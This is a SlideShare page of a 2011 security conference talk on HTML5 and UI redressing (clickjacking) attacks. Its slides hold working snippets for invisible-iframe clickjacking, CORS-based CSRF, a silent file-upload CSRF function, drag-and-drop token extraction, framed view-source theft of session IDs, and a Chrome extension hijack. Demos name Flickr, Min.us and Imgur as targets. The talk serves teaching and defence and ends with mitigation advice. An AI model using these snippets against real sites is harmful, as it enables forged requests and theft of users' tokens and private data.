SlideShare a Scribd company logo
HTML5:
Something wicked this way comes




HackPra, Bochum   Krzysztof Kotowicz, Securing
11.2011           krzysztof.kotowicz@securing.pl
                  @kkotowicz
About me

• security researcher
  • HTML 5
  • UI redressing / clickjacking
  • xss-track, squid-imposter, ...
• pentester
• IT security trainer
  • „Hacking HTML5”

                                     2
Plan

• Same Origin Policy
• Exploiting users
• Attack toolbox
  • demos
  • obligatory 0-day ;)
• Wrap-up


                          3
Same origin policy

• the single most important security
    concept for the web
• restricts communication between
    websites from different domains
• has many flavors
• without it hell breaks loose
  • worldwide XSS mayhem

                                       4
Same origin policy

• can be relaxed though
  • crossdomain.xml
  • document.domain
  • HTML5 Cross Origin Resource Sharing
• or ignored...
  • by exploiting users
  • UI redressing


                                          5
UI Redressing?




      Jedi mind tricks on victim users
                                         6
UI Redressing
 • This is not the page you’re looking at
 • This is not the thing you’re clicking
 • .................................................. dragging
 • .................................................. typing
 • .................................................. copying


 • Victims attack the applications for us


                                                                 7
Exploiting users




                   //goo.gl/DgPpY
                                8
Combined attacks

1. Analyze target
2. Choose pieces
    • HTML5
    • UI redressing
3. Plant the attack
4. ....
5. Profit!

                      9
Attack toolbox



                 10
Framing
<iframe src=//google.com></iframe>




                                     11
Framing

• Frames can
 • move
 • be nested
 • be invisible

<iframe src=//google.com
style="opacity:0;"></iframe>

                               12
Framing – prevention

• X-Frame-Options




                       13
Framing – prevention

• JS Framebusting

if (top !== self) {
    top.location = self.location;
}
// and many others....



                                    14
X-Frame-Options

 Marcus Niemietz, February 2011
 • Home pages HTTP header analysis
 • Based on Alexa
                    Count   Rate
    Top 100             3    3.00%
    Top 1000            9    0.90%
    Top 10000          33    0.33%
 Not that popular yet
                                     15
Basic clickjacking




                     16
Basic clickjacking




                     20x20   <iframe>




                                        17
Basic clickjacking



                               <iframe>


                        -300

             -350    20x20




                                          18
Basic clickjacking



                                     <iframe>
               Victim website


                     20x20   Like us, plz!



                                                19
Basic clickjacking
  <iframe src=outer.html
width=20 height=20 scrolling=no
style="opacity:0;"></iframe>

<!-- outer.html -->
<iframe src="//victim" width=5000
height=5000 style="position:
absolute; top:-300px; left:
-350px;"></iframe>

                                    20
Basic clickjacking
• Use to: click on link, button etc.
• Trick: Click here to see a video!
• User interaction: click


+   Any clickable action
+   Works in every browser
-   X-Frame-Option
-   JS framebusting
                                       21
HTML5 IFRAME sandbox

• Used to embed untrusted content
   • prevents XSS
   • prevents defacement
• Facilitates clickjacking!
<iframe sandbox="allow-same-origin
allow-forms allow-scripts"
 src="//victim"></iframe>
                              //html5sec.org/#122

                                                22
HTML5 IFRAME sandbox

• Use to: protect from frame busting



+ Chrome / Safari / IE 10
+ Will disable most JS framebusters
-   X-Frame-Option


                                       23
Cross Origin Resource Sharing

• HTML5-ish
• Cross domain AJAX
• With cookies
• Blind
  • Unless the receiving site agrees
• Not limited to <form> syntax


                                       24
Cross Origin Resource Sharing



var xhr = new XMLHttpRequest();
    
xhr.open("POST", "http://victim", true);
xhr.setRequestHeader("Content-Type", "text/plain");
xhr.withCredentials = "true"; // send cookies
xhr.send("Anything I want");




                                                  25
Cross Origin Resource Sharing

POST / HTTP/1.1
Host: victim
Referer: http://dev.localhost/temp/cors.php
Content-Length: 15
Origin: http://dev.localhost
Content-Type: text/plain
...
Cookie: my-cookie=myvalue

Anything I want

                                              26
Cross Origin Resource Sharing


• Use to: Cross Site Request Forgery
• User interaction: none



                                       27
Silent file upload

• File upload purely in Javascript
• Silent <input type=file> with any file
    name and content
• Uses CORS
• How?

    Raw multipart/form-data

                                         28
Silent file upload

function fileUpload(url, fileData, fileName) {
   var fileSize = fileData.length,
     boundary = "xxxxxxxxx",
     xhr = new XMLHttpRequest();
    
   xhr.open("POST", url, true);
   xhr.withCredentials = "true";
   xhr.setRequestHeader("Content-Type",
      "multipart/form-data, boundary="+boundary);
   xhr.setRequestHeader("Content-Length", fileSize);




                                                   29
Silent file upload

var body = "
--" + boundary + 'rn
Content-Disposition: form-data;
 name="contents"; filename="' + fileName + '"rn
Content-Type: application/octet-streamrn
rn
' + fileData + 'rn
--' + boundary + '--';

xhr.send(body);




                                                     30
Silent file upload

• Use to: CSRF file upload
• User interaction: none

+ Works in most browsers
+ You can add more form fields
-   CSRF flaw needed
-   No access to response
                                31
Silent file upload




                DEMO
              Flickr.com




                           32
Flickr.com attack toolbox

• Remember me
 • Flickr creates logged session on first request
• CSRF file upload
 • http://up.flickr.com/photos/upload/transfer/
 • accepts file uploads
 • token check skipped



                                                   33
Drag into

• Put attackers content into victim form




                                           34
Drag into




               DEMO
            Alphabet Hero




                            35
Drag into
• Use to: self XSS, fill whitelists, enter comments...
• Trick: Put paper in the can!
• User interaction: drag & drop, click


+   Inject arbitrary content
+   Trigger self-XSS
-   Firefox only
-   X-Frame-Option
-   JS framebusting
                                                        36
Drag out content extraction



    image


                    image




                              37
Drag out content extraction



    image
        victim
      <iframe>
                    image




                              38
Drag out content extraction



    image
        victim
      <iframe>
                   textarea
                     <textarea>




                                  39
Drag out content extraction

<div id=game style="position:relative">
    <img style="position:absolute;..."
          src="paper.png" />
    <img style="position:absolute;..."
          src="trash.png" />    
    <iframe scrolling=no id=iframe
     style="position:absolute;opacity:0;...">
     </iframe>
   <textarea style="position:absolute;
       opacity:0;..." id=dropper></textarea>
</div>

                                                40
Drag out content extraction




                              41
Drag out content extraction




                              42
Drag out content extraction

$("#iframe").attr('src', 'outer.html’);
$('#dropper').bind('drop', function() {
    setTimeout(function() {
        var urlmatch = $("#dropper").val()
                        .match(/token=([a-h0-9]+)$/);
        if (urlmatch) {
            var token = urlmatch[1];
            // do EVIL
        }
    }, 100);
});




                                                        43
Drag out content extraction
• Use to: get tokens, session ids, private data
• Trick: Put paper in the can!
• User interaction: drag & drop


+   Access sensitive content cross domain
-   Firefox only
-   X-Frame-Option
-   JS framebusting
                                                  44
Drag out content extraction




              DEMO
              Min.us




                              45
Min.us attack toolbox

• CORS to create gallery
• social engineering
  • extract gallery editor-id from <a href>
• silent file upload to gallery
• CORS change gallery to public


• HTML5 + UI redressing combined!
                                              46
View-source

• Display HTML source in frame
  • session IDs
  • tokens
  • private data
<iframe
 src="view-source:view-source:http://victim"
 width=5000 height=5000
 style="position: absolute;
        top: -300px; left: -150px;">
</iframe>

                                               47
View-source




              48
View-source




              49
View-source
• Use to: get more content
• Trick: Your serial number is...
• User interaction: select + drag & drop, copy-
   paste


+   Beats JS framebusting
-   X-Frame-Options
-   Firefox only
-   Complicated user action

                                                  50
View-source




                DEMO
              Imgur.com




                          51
Imgur.com attack toolbox

• framed view-source:
  • captcha-like string (AdSense ID)
  • session ID
• social engineering:
  • trick to copy/paste page source
• Exploitation:
  • http://api.imgur.com
  • cookie auth, no IP limits for session
                                            52
Google Chrome addons hijacking

• HTML5 apps
• Unique ID
  • chrome-extension://id/res.html
• Can attach content scripts to pages
  • access page DOM
  • JS runtimes are separated
     • page canot see addon JS
     • addon cannot see page JS
  • Can exchange messages with other components

                                                  53
Google Chrome addons hijacking

• Page can load addon resources
<iframe src="chrome-extension://
oadbo...adc/popup.html"></iframe>

var popup = window.open(
    'chrome-extension://oadbo...adc/
popup.html');

• So what?
                                    54
Google Chrome addons hijacking


• Chrome To Phone 2.3.1 hijack 0-day
  //kotowicz.net/chrome-to-phone/




                                       55
Google Chrome addons hijacking

• popup.html
chrome.extension.onConnect.addListener(function(port)
{
  port.onMessage.addListener(function(info) {
    //...
    sendToPhone(info.title, info.url, msgType,
info.selection,sendToPhoneListener);
  });
});
//...
chrome.tabs.executeScript(null, {file:
"content_script.js"});


                                                        56
Google Chrome addons hijacking

• content_script.js
var pageInfo = {
  "url": document.location.href,
  "title": document.title,
  "selection": window.getSelection().toString()
};

chrome.extension.connect().postMessage(pageInfo);




                                                    57
Google Chrome addons hijacking

1. popup loads when you click
2. starts listening
3. adds a script to current tab
4. script sends current URL
5. popup gets URL and sends to Android

                                  http://...
   popup.html
                        content_script.js
                                               58
Google Chrome addons hijacking

• manifest.json
     "content_scripts": [ {
        "js": [ "content_script.js" ],
        "matches": [ "http://*/*", "https://*/*" ]
     } ],

• Sending script is always attached to
    every page on every tab

                                       http://...
                               content_script.js
                                                     59
Google Chrome addons hijacking




                                 60
Google Chrome addons hijacking

• We just have to start listening


var popup = window.open('chrome-
extension://..../popup.html');
window.focus(); // hide popup




                                    61
Summary

• UI redressing attacks are improving
• HTML5 helps exploiting vulnerabilities
• Users can be a weak link too!

   Developers:
   Use X-Frame-Options:
   DENY

                                           62
Links
• html5sec.org
• code.google.com/p/html5security
• www.contextis.co.uk/research/white-papers/
   clickjacking
• blog.kotowicz.net
• github.com/koto


  Twitter: @kkotowicz
  kkotowicz@securing.pl

                                               63
?
    64

More Related Content

What's hot

Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
Jeremiah Grossman
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
Abraham Aranguren
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
Michele Orru
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Wayne Huang
 
DEfcon15 XXE XXS
DEfcon15 XXE XXSDEfcon15 XXE XXS
DEfcon15 XXE XXS
pentest pentest
 
Front end-security
Front end-securityFront end-security
Front end-security
Miao Siyu
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another Perspective
GreenD0g
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP Headers
Frank Kim
 
Browser Security
Browser SecurityBrowser Security
Browser Security
Roberto Suggi Liverani
 
Practical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon XPractical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon X
Michele Orru
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platforms
kosborn
 
Html5 security
Html5 securityHtml5 security
Html5 security
Krishna T
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorage
tomasperezv
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript Security
Jason Harwig
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEF
Michele Orru
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin Policy
Krishna T
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB
 
Java EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFishJava EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFish
Markus Eisele
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5
Krishna T
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
Mikhail Egorov
 

What's hot (20)

Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
 
DEfcon15 XXE XXS
DEfcon15 XXE XXSDEfcon15 XXE XXS
DEfcon15 XXE XXS
 
Front end-security
Front end-securityFront end-security
Front end-security
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another Perspective
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP Headers
 
Browser Security
Browser SecurityBrowser Security
Browser Security
 
Practical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon XPractical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon X
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platforms
 
Html5 security
Html5 securityHtml5 security
Html5 security
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorage
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript Security
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEF
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin Policy
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 
Java EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFishJava EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFish
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 

Similar to Html5: something wicked this way comes - HackPra

Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comes
Yury Chemerkin
 
Clickjacking
ClickjackingClickjacking
Clickjacking
Rishi Kant
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
Volkan Özçelik
 
Where There's Money, There's Crime: Web-based Threats
Where There's Money, There's Crime: Web-based ThreatsWhere There's Money, There's Crime: Web-based Threats
Where There's Money, There's Crime: Web-based Threats
Avast
 
Devouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site ScriptingDevouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site Scripting
gmaran23
 
Securing your web application through HTTP headers
Securing your web application through HTTP headersSecuring your web application through HTTP headers
Securing your web application through HTTP headers
Andre N. Klingsheim
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best Practices
Volkan Özçelik
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012
Volkan Özçelik
 
Postcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration nullPostcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration null
Piyush Pattanayak
 
Mobile Web Development with HTML5
Mobile Web Development with HTML5Mobile Web Development with HTML5
Mobile Web Development with HTML5
Roy Clarkson
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
David Stockton
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
David Stockton
 
Rwd slidedeck
Rwd slidedeckRwd slidedeck
Rwd slidedeck
Vera Kovaleva
 
Responsive Web Design tips and tricks.
Responsive Web Design tips and tricks.Responsive Web Design tips and tricks.
Responsive Web Design tips and tricks.
GaziAhsan
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
Jeremiah Grossman
 
Browser Horror Stories
Browser Horror StoriesBrowser Horror Stories
Browser Horror Stories
EC-Council
 
On the Edge Systems Administration with Golang
On the Edge Systems Administration with GolangOn the Edge Systems Administration with Golang
On the Edge Systems Administration with Golang
Chris McEniry
 
SCREENS - 2012-09-28 - Responsive Web Design, get the best from your design
SCREENS - 2012-09-28 - Responsive Web Design, get the best from your designSCREENS - 2012-09-28 - Responsive Web Design, get the best from your design
SCREENS - 2012-09-28 - Responsive Web Design, get the best from your design
Frédéric Harper
 
Javascript Security - Three main methods of defending your MEAN stack
Javascript Security - Three main methods of defending your MEAN stackJavascript Security - Three main methods of defending your MEAN stack
Javascript Security - Three main methods of defending your MEAN stack
Ran Bar-Zik
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
 

Similar to Html5: something wicked this way comes - HackPra (20)

Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comes
 
Clickjacking
ClickjackingClickjacking
Clickjacking
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
 
Where There's Money, There's Crime: Web-based Threats
Where There's Money, There's Crime: Web-based ThreatsWhere There's Money, There's Crime: Web-based Threats
Where There's Money, There's Crime: Web-based Threats
 
Devouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site ScriptingDevouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site Scripting
 
Securing your web application through HTTP headers
Securing your web application through HTTP headersSecuring your web application through HTTP headers
Securing your web application through HTTP headers
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best Practices
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012
 
Postcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration nullPostcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration null
 
Mobile Web Development with HTML5
Mobile Web Development with HTML5Mobile Web Development with HTML5
Mobile Web Development with HTML5
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
Rwd slidedeck
Rwd slidedeckRwd slidedeck
Rwd slidedeck
 
Responsive Web Design tips and tricks.
Responsive Web Design tips and tricks.Responsive Web Design tips and tricks.
Responsive Web Design tips and tricks.
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Browser Horror Stories
Browser Horror StoriesBrowser Horror Stories
Browser Horror Stories
 
On the Edge Systems Administration with Golang
On the Edge Systems Administration with GolangOn the Edge Systems Administration with Golang
On the Edge Systems Administration with Golang
 
SCREENS - 2012-09-28 - Responsive Web Design, get the best from your design
SCREENS - 2012-09-28 - Responsive Web Design, get the best from your designSCREENS - 2012-09-28 - Responsive Web Design, get the best from your design
SCREENS - 2012-09-28 - Responsive Web Design, get the best from your design
 
Javascript Security - Three main methods of defending your MEAN stack
Javascript Security - Three main methods of defending your MEAN stackJavascript Security - Three main methods of defending your MEAN stack
Javascript Security - Three main methods of defending your MEAN stack
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 

More from Krzysztof Kotowicz

Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Krzysztof Kotowicz
 
Trusted Types @ W3C TPAC 2018
Trusted Types @ W3C TPAC 2018Trusted Types @ W3C TPAC 2018
Trusted Types @ W3C TPAC 2018
Krzysztof Kotowicz
 
Trusted Types and the end of DOM XSS
Trusted Types and the end of DOM XSSTrusted Types and the end of DOM XSS
Trusted Types and the end of DOM XSS
Krzysztof Kotowicz
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
Krzysztof Kotowicz
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
Krzysztof Kotowicz
 
HTML5: Atak i obrona
HTML5: Atak i obronaHTML5: Atak i obrona
HTML5: Atak i obrona
Krzysztof Kotowicz
 
I'm in your browser, pwning your stuff
I'm in your browser, pwning your stuffI'm in your browser, pwning your stuff
I'm in your browser, pwning your stuff
Krzysztof Kotowicz
 
Creating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScriptCreating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScript
Krzysztof Kotowicz
 
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScriptTworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Krzysztof Kotowicz
 
Jak ocalić swoje dane przed SQL injection?
Jak ocalić swoje dane przed SQL injection?Jak ocalić swoje dane przed SQL injection?
Jak ocalić swoje dane przed SQL injection?
Krzysztof Kotowicz
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
Krzysztof Kotowicz
 
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Krzysztof Kotowicz
 

More from Krzysztof Kotowicz (12)

Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
 
Trusted Types @ W3C TPAC 2018
Trusted Types @ W3C TPAC 2018Trusted Types @ W3C TPAC 2018
Trusted Types @ W3C TPAC 2018
 
Trusted Types and the end of DOM XSS
Trusted Types and the end of DOM XSSTrusted Types and the end of DOM XSS
Trusted Types and the end of DOM XSS
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
 
HTML5: Atak i obrona
HTML5: Atak i obronaHTML5: Atak i obrona
HTML5: Atak i obrona
 
I'm in your browser, pwning your stuff
I'm in your browser, pwning your stuffI'm in your browser, pwning your stuff
I'm in your browser, pwning your stuff
 
Creating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScriptCreating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScript
 
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScriptTworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
 
Jak ocalić swoje dane przed SQL injection?
Jak ocalić swoje dane przed SQL injection?Jak ocalić swoje dane przed SQL injection?
Jak ocalić swoje dane przed SQL injection?
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
 

Recently uploaded

Taking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdfTaking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdf
ssuserfac0301
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
Zilliz
 
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
Edge AI and Vision Alliance
 
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Speck&Tech
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
Octavian Nadolu
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
Claudio Di Ciccio
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxOcean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
SitimaJohn
 
Infrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI modelsInfrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI models
Zilliz
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
Jason Packer
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
Matthew Sinclair
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
Daiki Mogmet Ito
 
Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
Zilliz
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
Matthew Sinclair
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
Kumud Singh
 
